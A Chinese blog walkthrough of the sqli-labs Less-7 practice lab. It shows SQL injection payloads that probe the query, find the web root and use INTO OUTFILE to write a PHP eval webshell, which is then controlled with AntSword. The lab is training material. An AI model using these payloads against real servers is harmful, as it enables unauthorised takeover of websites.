目 录CONTENT

文章目录

sqli-labs系列——Less-7

CZ
CZ
2023-06-05 / 1 评论 / 0 点赞 / 385 阅读 / 4046 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2024-04-24,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

摘要

本篇文章主要介绍了如何使用webshell上传一句话木马到sqli-labs的Less-7题目中,以此来实现对目标网站的控制。其中,通过HackBar插件判断注入点,通过order by语句判断字段数,通过union select语句注入一句话木马,最终使用蚁剑连接实现对目标网站的控制。

前言

这章主要考点就是webshell上传,由于我们docker部署的mysql无法上传,我们这章启用我们windows部署的sqli-labs,注意不是我屈服了,而是我不想半途而废,给大家一个完整的学习之路

准备

开启phpstudy,开启apache服务以及mysql服务

图片-1685954430268

实验环节

浏览器访问Less-7

http://127.0.0.1/sqli-labs-master/Less-7/

图片-1685954506936

打开HackBar插件

判断是否存在注入

http://127.0.0.1/sqli-labs-master/Less-7/?id=1'
#id=1',初步判断字符串注入

图片-1685955893476

分析是否存在括号及其个数

http://127.0.0.1/sqli-labs-master/Less-7/?id=1') and 1=1 -- xz  #一个括号页面还是显示报错
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) and 1=1 -- xz  #两个括号页面显示正常,由此可推断出,这是带双括号的单引号注入

图片-1685956131860

看到outfile分析存在文件上传注入

判断字段数

http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 4 -- xz

图片-1685956489475

实验环节

1、先判断题目的绝对路径,由于本题没有回显报错,所以无法获得路径,但是之前的1-6题都有回显报错,可以从这块入手,我这里用的是Less-1

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,@@datadir -- xz
#由此可以看出网站的绝对路径是D:\phpstudy_pro\WWW,通过了解sqli-labs的结构可以得出完整路径为D:\phpstudy_pro\WWW\sqli-labs-master\Less-7

图片-1685956794421

2、查看读写权限

http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) and (select count(*) from mysql.user)>0 -- xz
#返回正常,说明具有文件读写权限

图片-1685965116920

导入一句话木马

http://127.0.0.1/sqli-labs-master/Less-7/?id=-1'))union select 1,"<?php eval($_REQUEST[cz])?>",3 into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\shell.php" -- xz
#可以看出shell.php文件已经成功上传

图片-1685965252570 图片-1685965271105

蚁剑连接

http://192.168.1.40/sqli-labs-master/Less-7/shell.php
#这里的ip地址是我本机的ip地址,因为蚁剑在虚拟机,所以连接要带ip地址

图片-1685970644974

成功登录,我们可以在文件目录下操作,也可以在控制台上进行任何操作

图片-1685970774498 图片-1685970815283

0

评论区